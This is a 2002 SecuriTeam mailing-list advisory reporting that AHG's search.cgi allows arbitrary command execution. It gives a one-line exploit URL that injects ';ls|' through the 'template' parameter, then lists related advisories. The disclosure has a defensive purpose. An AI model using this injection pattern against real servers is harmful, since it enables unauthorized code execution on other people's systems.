[NEWS] Bug in AHG Search Engines Leads to Code Execution

From: support@securiteam.com
Date: 01/29/02

From: support@securiteam.com
To: list@securiteam.com
Date: Tue, 29 Jan 2002 22:32:50 +0100 (CET)

- - promotion

When was the last time you checked your server's security?
How about a monthly report?
http://www.AutomatedScanning.com - Know that you're safe.
- - - - - - - - -

  Bug in AHG Search Engines Leads to Code Execution

SUMMARY

AHG's <http://www.ahg.com/software_frame.htm#searchengines> Search Engine
can search sites with a maximum of 500 - 800 pages. A security
vulnerability in the product allows execution of arbitrary code.

DETAILS

Exploit:
For example, to list the current directory:
http://www.example.com/cgi-bin/publisher/search.cgi?dir=jobs&template=;ls|&output_number=10

ADDITIONAL INFORMATION

The information has been provided by <mailto:xakepsin@quake.ru> Aleksey
Sintsov.

====================
====================

DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.

Relevant Pages

  • [NEWS] Java HTTP Proxy Vulnerability (Additional Details)
    (Securiteam)
  • [UNIX] Gridscan.com Security-risk
    ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... The information in this bulletin is provided "AS IS" without warranty of any kind. ... In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages. ...
    (Securiteam)
  • [NEWS] <BODY>Builder SQL modification
    ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... The information in this bulletin is provided "AS IS" without warranty of any kind. ... In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages. ...
    (Securiteam)
  • [UNIX] Path Disclosure Bug in TOPo
    ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... Beyond Security would like to welcome Tiscali World Online ... The information in this bulletin is provided "AS IS" without warranty of any kind. ... In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages. ...
    (Securiteam)
  • [UNIX] Plumtree Corporate Portal Cross-Site Scripting
    ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... Site Scripting vulnerability. ... The information in this bulletin is provided "AS IS" without warranty of any kind. ...
    (Securiteam)